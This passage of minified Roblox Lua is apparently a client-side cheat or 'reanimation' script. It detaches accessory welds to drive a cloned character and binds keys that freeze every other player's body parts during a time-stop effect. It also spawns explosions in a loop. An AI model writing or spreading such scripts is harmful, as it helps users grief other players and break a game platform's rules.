UpperLeg.Leg.Transparency=1;Character.Bot.LeftUpperLeg.Base.Transparency=1;Character.Bot.LeftUpperLeg.Leg2.Transparency=1;Character.Bot.LeftUpperLeg.Knee.Transparency=1;while true do wait(0.1)local oX=Instance.new("Explosion",Workspace)oX:Remove()end end)end;function Clickey11()pcall(function()local Player=game:GetService("Players").LocalPlayer;local Character=Player.Character;local R={rightarm=Character:WaitForChild("Hat1"),leftarm=Character:WaitForChild("Pal Hair"),rightleg=Character:WaitForChild("LavanderHair"),leftleg=Character:WaitForChild("Pink Hair"),torso=Character:WaitForChild("Meshes/CrescentHornsAccessory")}local S={head=Character:WaitForChild("EmotimaskRelax"),bloosh=Character:WaitForChild("EmotimaskBlush"),cyoot=Character:WaitForChild("EmotimaskCute"),heir=Character:WaitForChild("Whispy Double Bun Bangs"),fwuffyeaws=Character:WaitForChild("FluffyEars")}for T,v in next,R do v.Handle.AccessoryWeld:Remove()for U,V in next,v:GetDescendants()do if V:IsA("Mesh")or V:IsA("SpecialMesh")then V:Remove()end end end;for T,v in next,S do v.Handle.AccessoryWeld:Remove()end;local function W(T,v)local X=Instance.new("Attachment",T)X.Position=Vector3.new(0,0,0)local Y=Instance.new("Attachment",v)Y.Position=Vector3.new(0,0,0)local Z=Instance.new("AlignPosition",T)Z.Attachment0=X;Z.Attachment1=Y;Z.RigidityEnabled=false;Z.ReactionForceEnabled=false;Z.ApplyAtCenterOfMass=true;Z.MaxForce=9999999;Z.MaxVelocity=math.huge;Z.Responsiveness=math.huge;local _=Instance.new("AlignOrientation",T)_.Attachment0=X;_.Attachment1=Y;_.ReactionTorqueEnabled=true;_.PrimaryAxisOnly=false;_.MaxTorque=9999999;_.MaxAngularVelocity=math.huge;_.Responsiveness=math.huge end;wait(0.016666666666666666)plr=game:GetService("Players").LocalPlayer;mse=plr:GetMouse()sound=Instance.new("Sound",game:GetService("Workspace"))sound.SoundId="https://www.roblox.com/asset/?id=274698941"sound.Volume=10;canworld=true;mse.KeyDown:connect(function(dr)dr=dr:lower()if dr=="g"then if canworld==false then return end;if canworld then canworld=false;sound:Play()local function oY()sphere=Instance.new("Part")local oZ=Instance.new("SpecialMesh",sphere)oZ.MeshType="Sphere"sphere.Transparency=1;sphere.Anchored=true;sphere.CanCollide=false;sphere.Material="SmoothPlastic"sphere.BrickColor=BrickColor.new("Lapis")end;local function weld(o_)local weld=Instance.new("Weld",plr.Character.Torso)weld.Part0=plr.Character.Torso;weld.Part1=o_;weld.C0=plr.Character.Torso.CFrame:inverse()weld.C1=o_.CFrame:inverse()end;wait(1.4)oY()for T,v in pairs(game:GetService("Players"):GetChildren())do t=v.Character:FindFirstChild("Torso")if t then t.Anchored=true;plr.Character:FindFirstChild("Torso").Anchored=false end;RA=v.Character:FindFirstChild("Right Arm")if RA then RA.Anchored=true;plr.Character:FindFirstChild("Right Arm").Anchored=false end;LA=v.Character:FindFirstChild("Left Arm")if LA then LA.Anchored=true;plr.Character:FindFirstChild("Left Arm").Anchored=false end;RL=v.Character:FindFirstChild("Right Leg")if RL then RL.Anchored=true;plr.Character:FindFirstChild("Right Leg").Anchored=false end;LL=v.Character:FindFirstChild("Left Leg")if LL then LL.Anchored=true;plr.Character:FindFirstChild("Left Leg").Anchored=false end end;weld(sphere)cce=Instance.new("ColorCorrectionEffect",game.Lighting)cce.Saturation=-2;sphere.Parent=game:GetService("Workspace");for T=1,10 do sphere.Size=sphere.Size+Vector3.new(50,50,50)wait()end end end end)mse.KeyDown:connect(function(dr)dr=dr:lower()if dr=="h"then canworld=true;for T,v in pairs(game:GetService("Players"):GetChildren())do t=v.Character:FindFirstChild("Torso")if t then t.Anchored=false end;RA=v.Character:FindFirstChild("Right Arm")if RA then RA.Anchored=false end;LA=v.Character:FindFirstChild("Left Arm")if LA then LA.Anchored=false end;RL=v.Character:FindFirstChild("Right Leg")if RL then RL.Anchored=false end;LL=v.Character:FindFirstChild("Left Leg")if LL then LL.Anchored=false end end;cce.Saturation=0;sphere:Destroy()end end)Effects=m;local Player=game:GetService("Players").localPlayer;local Character=Player.Character;Character.Archivable=true;AdvancingFortress=Character:Clone()AdvancingFortress.Parent=Character;torso=AdvancingFortress.Torso;hum=AdvancingFortress.Humanoid;AdvancingFortress.Name="AdvancingFortress"pl=AdvancingFortress;for T,v in pairs(AdvancingFortress:GetChildren())do if v:IsA("BasePart")then v.Transparency=1 end end;local Humanoid=AdvancingFortress.Humanoid;local Mouse=Player:GetMouse()local LeftArm=AdvancingFortress["Left Arm"]local RightArm=AdvancingFortress["Right Arm"]local LeftLeg=AdvancingFortress["Left Leg"]local RightLeg=AdvancingFortress["Right Leg"]local Head=AdvancingFortress.Head;local Torso=AdvancingFortress.Torso;local p0=game:GetService("Workspace").CurrentCamera;local RootPart=AdvancingFortress.HumanoidRootPart;local RootJoint=RootPart.RootJoint;local dS=false;local N="Idle"local ic=1;local id=(RootPart.Velocity*Vector3.new(1,0,1)).magnitude;local ie=RootPart.Velocity.y;local dQ=0;local dR=1;local Create=LoadLibrary("RbxUtility").Create;local p2=false;local m=Create("Model")({Parent=AdvancingFortress,Name="WeaponModel"})Head.face:remove()AdvancingFortress.Head.Name="FHead"AdvancingFortress.Torso.Name="FTorso"AdvancingFortress.HumanoidRootPart.Name="FHumanoidRootPart"Humanoid.Animator.Parent=nil;AdvancingFortress.Animate.Parent=nil;local function p3(eQ,eR,dH,dG)local c4=Create("Weld")({Parent=eQ,Part0=eQ,Part1=eR,C0=dH,C1=dG})return c4 end;function clerp(a,b,t)return a:lerp(b,t)end;RootCF=CFrame.fromEulerAnglesXYZ(-1.57,0,3.14)NeckCF=CFrame.new(0,1,0,-1,0,0,0,0,1,0,1,0)local RW=p3(Torso,RightArm,CFrame.new(1.5,0,0),CFrame.new(0,0,0))local LW=p3(Torso,LeftArm,CFrame.new(-1.5,0,0),CFrame.new(0,0,0))local RH=p3(Torso,RightLeg,CFrame.new(0.5,-2,0),CFrame.new(0,0,0))local LH=p3(Torso,LeftLeg,CFrame.new(-0.5,-2,0),CFrame.new(0,0,0))RootJoint.C1=CFrame.new(0,0,0)RootJoint.C0=CFrame.new(0,0,0)Torso.Neck.C1=CFrame.new(0,0,0)Torso.Neck.C0=CFrame.new(0,1.5,0)local p4=RW.C1;local p5=LW.C1;local p6=RH.C1;local p7=LH.C1;local p8=false;function PlayAnimationFromTable(table,speed,jl)RootJoint.C0=clerp(RootJoint.C0,table[1],speed)Torso.Neck.C0=clerp(Torso.Neck.C0,table[2],speed)RW.C0=clerp(RW.C0,table[3],speed)LW.C0=clerp(LW.C0,table[4],speed)RH.C0=clerp(RH.C0,table[5],speed)LH.C0=clerp(LH.C0,table[6],speed)if jl==true and p8==false then p8=true;RootJoint.C1=RootJoint.C1;Torso.Neck.C1=Torso.Neck.C1;RW.C1=p4;LW.C1=p5;RH.C1=p6;LH.C1=p7 end end;function swait(bA)if bA==0 or bA==nil then game:GetService("RunService").Heartbeat:wait()game:GetService("RunService").Heartbeat:wait()else for T=0,bA do game:GetService("RunService").Heartbeat:wait()game:GetService("RunService").Heartbeat:wait()end end end;function RemoveOutlines(ec)ec.TopSurface,ec.BottomSurface,ec.LeftSurface,ec.RightSurface,ec.FrontSurface,ec.BackSurface=10,10,10,10,10,10 end;CFuncs={Part={Create=function(ed,ee,ef,eg,eh,ei,k)local Part=Create("Part")({Parent=ed,Reflectance=ef,Transparency=eg,CanCollide=false,Locked=true,BrickColor=BrickColor.new(tostring(eh)),Name=ei,Size=k,Material=ee})RemoveOutlines(Part)return Part end},Mesh={Create=function(Mesh,Part,ej,ek,el,em)local en=Create(Mesh)({Parent=Part,Offset=el,Scale=em})if Mesh=="SpecialMesh"then en.MeshType=ej;en.MeshId=ek end;return en end},Weld={Create=function(ed,Part0,aA,eo,ep)local Weld=Create("Weld")({Parent=ed,Part0=Part0,Part1=aA,C0=eo,C1=ep})return Weld end},Sound={Create=function(eq,par,er,pit)local Sound=Create("Sound")({Volume=er,Pitch=pit or 1,SoundId="rbxassetid://"..eq,Parent=par or workspace})Sound:play()game:GetService("Debris"):AddItem(Sound,130)return Sound end},Decal={Create=function(Color,ev,eg,ei,ed)local p9=Create("Decal")({Color3=Color,Texture="rbxassetid://"..ev,Transparency=eg,Name=ei,Parent=ed})return p9 end},BillboardGui={Create=function(ed,pa,i,k)local pb=CFuncs.Part.Create(ed,"SmoothPlastic",0,1,BrickColor.new("Black"),"BillboardGuiPart",Vector3.new(1,1,1))pb.CFrame=CFrame.new(i)local pc=Create("BillboardGui")({Parent=pb,Adornee=pb,Size=UDim2.new(1,0,1,0),SizeOffset=Vector2.new(k,k)})local pd=Create("ImageLabel",pc)({Parent=pc,BackgroundTransparency=1,Size=UDim2.new(1,0,1,0),Image="rbxassetid://"..pa})return pb end},ParticleEmitter={Create=function(ed,es,et,eu,k,ev,eg,ew,ex,ey,ez,eA,eB,eC,eD,eE,eF,eG,l,eH)local pe=Create("ParticleEmitter")({Parent=ed,Color=ColorSequence.new(es,et),LightEmission=eu,Size=k,Texture=ev,Transparency=eg,ZOffset=ew,Acceleration=ex,Drag=ey,LockedToPart=ez,VelocityInheritance=eA,EmissionDirection=eB,Enabled=eC,Lifetime=eD,Rate=eE,Rotation=eF,RotSpeed=eG,Speed=l,VelocitySpread=eH})return pe end},CreateTemplate={}}function rayCast(i,j7,j8,eV)return game:service("Workspace"):FindPartOnRay(Ray.new(i,j7.unit*(j8 or 999.999)),eV)end;function FindNearestTorso(pos)local pf=game:GetService("Workspace"):children()local torso;local jd=1000;local pg,ph,pi;for x=1,#pf do pi=pf[x]if pi.className=="Model"and pi.Name~=Character.Name then pg=pi:findFirstChild("Torso")ph=pi:findFirstChild("Humanoid")if pg~=nil and ph~=nil and ph.Health>0 and jd>(pg.Position-pos).magnitude then local pj=true;if pj==true then torso=pg;jd=(pg.Position-pos).magnitude end end end end;return torso,jd end;function Damage(Part,hit,gc,gd,ge,gf,gg,Delay,gh,gi)if hit.Parent==nil then return end;local h=hit.Parent:FindFirstChild("Humanoid")for U,v in pairs(hit.Parent:children())do if v:IsA("Humanoid")then h=v end end;if h~=nil and hit.Parent.Name~=Character.Name and hit.Parent:FindFirstChild("Torso")~=nil then if hit.Parent:findFirstChild("DebounceHit")~=nil and hit.Parent.DebounceHit.Value==true then return end;local c=Create("ObjectValue")({Name="creator",Value=game:service("Players").LocalPlayer,Parent=h})game:GetService("Debris"):AddItem(c,0.5)CFuncs.Sound.Create(gh,hit,1,gi)local Damage=math.random(0,0)local go=false;local gq=hit.Parent:findFirstChild("Block")if gq~=nil and gq.className=="IntValue"and gq.Value>0 then go=true;gq.Value=gq.Value-1;print(gq.Value)end;if p2==false then h.Health=h.Health-Damage;ShowDamage(Part.CFrame*CFrame.new(0,0,Part.Size.Z/2).p+Vector3.new(0,1.5,0),-Damage,1.5,BrickColor.new("Cool yellow").Color)elseif p2==true then repeat wait()until p2==false;h.Health=h.Health-Damage/2;ShowDamage(Part.CFrame*CFrame.new(0,0,Part.Size.Z/2).p+Vector3.new(0,1.5,0),-Damage,1.5,BrickColor.new("Cool yellow").Color)end;if gf=="Knockdown"then local hum=hit.Parent.Humanoid;hum.PlatformStand=true;coroutine.resume(coroutine.create(function(gr)swait(1)gr.PlatformStand=false end),hum)local gs=hit.Position-(gg.Position+Vector3.new(0,0,0)).unit;local gt=Create("BodyVelocity")({velocity=gs*ge,P=5000,maxForce=Vector3.new(8000,8000,8000),Parent=hit})local gu=Create("BodyAngularVelocity")({P=3000,maxTorque=Vector3.new(500000,500000,500000)*50000000000000,angularvelocity=Vector3.new(math.random(-10,10),math.random(-10,10),math.random(-10,10)),Parent=hit})game:GetService("Debris"):AddItem(gt,0.5)game:GetService("Debris"):AddItem(gu,0.5)elseif gf=="Normal"then local gn=Create("BodyVelocity")({P=500,maxForce=Vector3.new(math.huge,0,math.huge),velocity=gg.CFrame.lookVector*ge+gg.Velocity/1.05})if ge>0 then gn.Parent=hit.Parent.Torso end;game:GetService("Debris"):AddItem(gn,0.5)elseif gf=="Up"then local gx=Create("BodyVelocity")({velocity=Vector3.new(0,20,0),P=5000,maxForce=Vector3.new(8000,8000,8000),Parent=hit})game:GetService("Debris"):AddItem(gx,0.5)elseif gf=="DarkUp"then coroutine.resume(coroutine.create(function()for T=0,1,0.1 do swait()Effects.Block.Create(BrickColor.new("Black"),hit.Parent.Torso.CFrame,5,5,5,1,1,1,0.08,1)end end))local gx=Create("BodyVelocity")({velocity=Vector3.new(0,20,0),P=5000,maxForce=Vector3.new(8000,8000,8000),Parent=hit})game:GetService("Debris"):AddItem(gx,1)elseif gf=="Snare"then local gy=Create("BodyPosition")({P=2000,D=100,maxForce=Vector3.new(math.huge,math.huge,math.huge),position=hit.Parent.Torso.Position,Parent=hit.Parent.Torso})game:GetService("Debris"):AddItem(gy,1)elseif gf=="Freeze"then local gz=Create("BodyPosition")({P=50000,D=1000,maxForce=Vector3.new(math.huge,math.huge,math.huge),position=hit.Parent.Torso.Position,Parent=hit.Parent.Torso})local gA=Create("BodyGyro")({maxTorque=Vector3.new(400000,400000,400000)*math.huge,P=20000,Parent=hit.Parent.Torso,cframe=hit.Parent.Torso.CFrame})hit.Parent.Torso.Anchored=true;coroutine.resume(coroutine.create(function(Part)swait(1.5)Part.Anchored=false end),hit.Parent.Torso)game:GetService("Debris"):AddItem(gz,3)game:GetService("Debris"):AddItem(gA,3)end;local gB=Create("BoolValue")({Name="DebounceHit",Parent=hit.Parent,Value=true})game:GetService("Debris"):AddItem(gB,Delay)c=Create("ObjectValue")({Name="creator",Value=Player,Parent=h})game:GetService("Debris"):AddItem(c,0.5)end end;function ShowDamage(eS,gC,gD,Color)local eE=0.03333333333333333;local eS=eS or Vector3.new(0,0,0)local gC=gC or""local gD=gD or 2;local Color=Color or Color3.new(1,0,1)local gE=CFuncs.Part.Create(workspace,"SmoothPlastic",0,1,BrickColor.new(Color),"Effect",Vector3.new(0,0,0))gE.Anchored=true;local gF=Create("BillboardGui")({Size=UDim2.new(3,0,3,0),Adornee=gE,Parent=gE})local gG=Create("TextLabel")({BackgroundTransparency=1,Size=UDim2.new(1,0,1,0),Text=gC,Font="SciFi",TextColor3=Color,TextScaled=true,Parent=gF})game.Debris:AddItem(gE,gD)gE.Parent=game:GetService("Workspace")delay(0,function()local gH=gD/eE;for jI=1,gH do wait(eE)local jJ=jI/gH;gE.CFrame=CFrame.new(eS)+Vector3.new(0,jJ,0)gG.TextTransparency=jJ end;if gE and gE.Parent then gE:Destroy()end end)end;local pk=false;function MagnitudeDamage(Part,pm,pn,po,pp,gf,gh,gi)for U,c in pairs(workspace:children())do local hum=c:findFirstChild("Humanoid")if hum~=nil then local head=c:findFirstChild("Torso")if head~=nil then local gN=head.Position-Part.Position;local gO=gN.magnitude;if pm>=gO and c.Name~=Player.Name then Damage(head,head,pn,po,pp,gf,RootPart,0.1,gh,gi)if pk==true then for T=1,3 do Effects.Block.Create(BrickColor.new("Cool yellow"),head.CFrame,1,1,1,4,4,4,0.07,1)end;for T=1,10 do CamShake(1,70000)Effects.Break.Create(BrickColor.new("Cool yellow"),head.CFrame,1,1,1)end elseif pk==false then CamShake(1,90000)Effects.Block.Create(BrickColor.new("Cool yellow"),head.CFrame,0.5,0.5,0.5,0.5,0.5,0.5,0.07,1)for T=1,2 do Effects.Break.Create(BrickColor.new("Cool yellow"),head.CFrame,0.4,0.4,0.4)end end end end end end end;HHandle=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","HHandle",Vector3.new(1.09999979,0.299999923,1.0999999))HHandleWeld=CFuncs.Weld.Create(m,Head,HHandle,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(0.0646438599,-0.0500068665,-0.0646400452,-0.707107365,-3.21031663E-8,0.707106411,-8.19564079E-8,1.00000119,-1.41561088E-7,-0.707106352,1.38630043E-7,-0.707107484))Eye1=CFuncs.Part.Create(m,Enum.Material.Neon,0,1,"Deep orange","Eye1",Vector3.new(0.400000006,0.200000003,0.200000003))PartWeld=CFuncs.Weld.Create(m,HHandle,Eye1,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(0.0381011963,-0.0574798584,0.471725464,-2.89082527E-6,0.173647985,-0.984807968,-6.2584877E-7,0.984808922,0.173648104,1.00000012,1.02902288E-6,-2.77161598E-6))CFuncs.Mesh.Create("SpecialMesh",Eye1,Enum.MeshType.Sphere,"",Vector3.new(0,0,0),Vector3.new(1,1,1))Eye2=CFuncs.Part.Create(m,Enum.Material.Neon,0,1,"Really black","Eye2",Vector3.new(0.400000006,0.200000003,0.200000003))PartWeld=CFuncs.Weld.Create(m,HHandle,Eye2,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(0.0115432739,-0.0487277508,0.482452393,-0.981060266,-0.173648134,-0.0858327746,-0.172987267,0.984808922,-0.0151339322,0.0871568322,3.96735317E-7,-0.996194839))CFuncs.Mesh.Create("SpecialMesh",Eye2,Enum.MeshType.Sphere,"",Vector3.new(0,0,0),Vector3.new(1,1,1))THandle=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Medium stone grey","THandle",Vector3.new(1,0.799999893,1))THandleWeld=CFuncs.Weld.Create(m,Torso,THandle,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(0,0,0,1,-8.19564079E-8,5.96046519E-8,-8.19564079E-8,1.00000119,-1.41561088E-7,5.96046519E-8,-1.41561088E-7,1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(1.80000019,0.300000012,1.80000007))PartWeld=CFuncs.Weld.Create(m,THandle,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(-6.10351563E-5,-1.04342794,-0.404396057,1,-8.19564079E-8,5.96046519E-8,-1.01078633E-7,0.939694166,-0.342019171,1.52638329E-8,0.34201926,0.939693213))CFuncs.Mesh.Create("CylinderMesh",Part,"","",Vector3.new(0,0,0),Vector3.new(1,1,1))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(0.200000003,1.10000002,0.300000012))PartWeld=CFuncs.Weld.Create(m,THandle,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(-5.34057617E-5,-0.943422318,-1.35441589,1,-8.19564079E-8,5.96046519E-8,-1.01078633E-7,0.939694166,-0.342019171,1.52638329E-8,0.34201926,0.939693213))CFuncs.Mesh.Create("CylinderMesh",Part,"","",Vector3.new(0,0,0),Vector3.new(1,1,1))AHandleR=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","AHandleR",Vector3.new(0.799999952,0.800000012,1.22000003))AHandleRWeld=CFuncs.Weld.Create(m,RightArm,AHandleR,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(-0.209915161,0.00999641418,-3.81469727E-6,1,-8.19564079E-8,5.96046519E-8,-8.19564079E-8,1.00000119,-1.41561088E-7,5.96046519E-8,-1.41561088E-7,1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(0.200000003,0.899999976,1.01999998))PartWeld=CFuncs.Weld.Create(m,AHandleR,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(0.0999984741,0.550004005,0,1,-8.19564079E-8,5.96046519E-8,-8.19564079E-8,1.00000119,-1.41561088E-7,5.96046519E-8,-1.41561088E-7,1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(0.300000012,0.200000003,0.200000003))PartWeld=CFuncs.Weld.Create(m,AHandleR,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(-0.150001526,0.200003624,-0.359994888,1,-8.19564079E-8,5.96046519E-8,-8.19564079E-8,1.00000119,-1.41561088E-7,5.96046519E-8,-1.41561088E-7,1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(0.300000012,0.200000003,0.200000003))PartWeld=CFuncs.Weld.Create(m,AHandleR,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(-0.149993896,0.20000267,0.359992981,1,-8.19564079E-8,5.96046519E-8,-8.19564079E-8,1.00000119,-1.41561088E-7,5.96046519E-8,-1.41561088E-7,1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(1.20000005,0.800000012,1.20000005))PartWeld=CFuncs.Weld.Create(m,AHandleR,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(-0.209899902,-0.809997559,5.7220459E-6,-1,8.19564079E-8,-5.96046519E-8,-8.19564079E-8,1.00000119,-1.41561088E-7,-5.96046519E-8,1.41561088E-7,-1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(0.200000003,0.699999988,1.01999998))PartWeld=CFuncs.Weld.Create(m,AHandleR,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(0.300003052,0.650004387,1.71661377E-5,1,-8.19564079E-8,5.96046519E-8,-8.19564079E-8,1.00000119,-1.41561088E-7,5.96046519E-8,-1.41561088E-7,1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(0.300000012,0.699999988,1.01999998))PartWeld=CFuncs.Weld.Create(m,AHandleR,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(-0.149993896,0.650003433,0,1,-8.19564079E-8,5.96046519E-8,-8.19564079E-8,1.00000119,-1.41561088E-7,5.96046519E-8,-1.41561088E-7,1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(0.200000003,0.699999928,0.520000041))PartWeld=CFuncs.Weld.Create(m,AHandleR,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(-0.199996948,-0.049996376,-3.81469727E-6,1,-8.19564079E-8,5.96046519E-8,-8.19564079E-8,1.00000119,-1.41561088E-7,5.96046519E-8,-1.41561088E-7,1.00000024))HitboxR=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","HitboxR",Vector3.new(0.799999952,0.800000012,1.22000003))HitboxRWeld=CFuncs.Weld.Create(m,AHandleR,HitboxR,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(0,0.700003624,0,1,-8.19564079E-8,5.96046519E-8,-8.19564079E-8,1.00000119,-1.41561088E-7,5.96046519E-8,-1.41561088E-7,1.00000024))AHandleL=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","AHandleL",Vector3.new(0.800000072,0.800000012,1.22000003))AHandleLWeld=CFuncs.Weld.Create(m,LeftArm,AHandleL,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(-0.210014343,0.00999736786,1.14440918E-5,-1,8.19564079E-8,-5.96046519E-8,-8.19564079E-8,1.00000119,-1.41561088E-7,-5.96046519E-8,1.41561088E-7,-1.00000024))HitboxL=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","HitboxL",Vector3.new(0.800000072,0.800000012,1.22000003))HitboxLWeld=CFuncs.Weld.Create(m,AHandleL,HitboxL,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(0,0.700003624,0,1,8.19564079E-8,5.96046519E-8,8.19564079E-8,1.00000119,1.41561088E-7,5.96046519E-8,1.41561088E-7,1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(0.300000012,0.200000003,0.200000003))PartWeld=CFuncs.Weld.Create(m,AHandleL,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(-0.149986267,0.200001717,-0.360012054,1,8.19564079E-8,5.96046519E-8,8.19564079E-8,1.00000119,1.41561088E-7,5.96046519E-8,1.41561088E-7,1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(0.200000003,0.699999928,0.520000041))PartWeld=CFuncs.Weld.Create(m,AHandleL,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(-0.199989319,-0.0499982834,-9.53674316E-6,1,8.19564079E-8,5.96046519E-8,8.19564079E-8,1.00000119,1.41561088E-7,5.96046519E-8,1.41561088E-7,1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(0.300000012,0.200000003,0.200000003))PartWeld=CFuncs.Weld.Create(m,AHandleL,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(-0.149986267,0.200001717,0.359992981,1,8.19564079E-8,5.96046519E-8,8.19564079E-8,1.00000119,1.41561088E-7,5.96046519E-8,1.41561088E-7,1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(1.20000005,0.800000012,1.20000005))PartWeld=CFuncs.Weld.Create(m,AHandleL,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(-0.21005249,-0.81000042,2.28881836E-5,-1,-8.19564079E-8,-5.96046519E-8,8.19564079E-8,1.00000119,1.41561088E-7,-5.96046519E-8,-1.41561088E-7,-1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(0.200000003,0.899999976,1.01999998))PartWeld=CFuncs.Weld.Create(m,AHandleL,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(0.0999984741,0.550003052,-5.7220459E-6,1,8.19564079E-8,5.96046519E-8,8.19564079E-8,1.00000119,1.41561088E-7,5.96046519E-8,1.41561088E-7,1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(0.200000003,0.699999988,1.01999998))PartWeld=CFuncs.Weld.Create(m,AHandleL,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(0.299995422,0.650003433,-3.81469727E-6,1,8.19564079E-8,5.96046519E-8,8.19564079E-8,1.00000119,1.41561088E-7,5.96046519E-8,1.41561088E-7,1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(0.300000012,0.699999988,1.01999998))PartWeld=CFuncs.Weld.Create(m,AHandleL,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(-0.149993896,0.65000248,0,1,8.19564079E-8,5.96046519E-8,8.19564079E-8,1.00000119,1.41561088E-7,5.96046519E-8,1.41561088E-7,1.00000024))LHandleR=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","LHandleR",Vector3.new(1.02999997,1.00999999,1.19000006))LHandleRWeld=CFuncs.Weld.Create(m,RightLeg,LHandleR,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(0.00498962402,-0.0950021744,0.00499534607,-1,8.19564079E-8,-5.96046519E-8,-8.19564079E-8,1.00000119,-1.41561088E-7,-5.96046519E-8,1.41561088E-7,-1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(0.800000012,0.800000012,0.200000003))PartWeld=CFuncs.Weld.Create(m,LHandleR,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(-0.00498962402,-0.00499916077,-0.604999542,1,8.19564079E-8,5.96046519E-8,8.19564079E-8,1.00000119,1.41561088E-7,5.96046519E-8,1.41561088E-7,1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(1.02999997,1.00999999,1.19000006))PartWeld=CFuncs.Weld.Create(m,LHandleR,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(0,0.600002289,0,1,8.19564079E-8,5.96046519E-8,8.19564079E-8,1.00000119,1.41561088E-7,5.96046519E-8,1.41561088E-7,1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(1.02999997,0.699999928,1.19000006))PartWeld=CFuncs.Weld.Create(m,LHandleR,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(0,-0.454998016,0,1,8.19564079E-8,5.96046519E-8,8.19564079E-8,1.00000119,1.41561088E-7,5.96046519E-8,1.41561088E-7,1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(0.400000006,1.20000005,0.200000003))PartWeld=CFuncs.Weld.Create(m,LHandleR,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(-0.00499725342,-0.00499916077,-0.604999542,1,8.19564079E-8,5.96046519E-8,8.19564079E-8,1.00000119,1.41561088E-7,5.96046519E-8,1.41561088E-7,1.00000024))Part=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,"Camo","Part",Vector3.new(0.800000131,1.20000005,0.800000012))PartWeld=CFuncs.Weld.Create(m,LHandleR,Part,CFrame.new(0,0,0,1,0,0,0,1,0,0,0,1),CFrame.new(0.00499725342,0.0149993896,0.00500297546,2.28095047E-7,1.00000775,2.99581131E-7,-1.00000417,5.63755016E-8,-4.06898749E-7,-2.98379774E-7,2.07959161E-8,1.0000037))CFuncs.Mesh.Create("CylinderMesh",Part,"","",Vector3.new(0,0,0),Vector3.new(1,1,1))Wedge=CFuncs.Part.Create(m,Enum.Material.SmoothPlastic,0,1,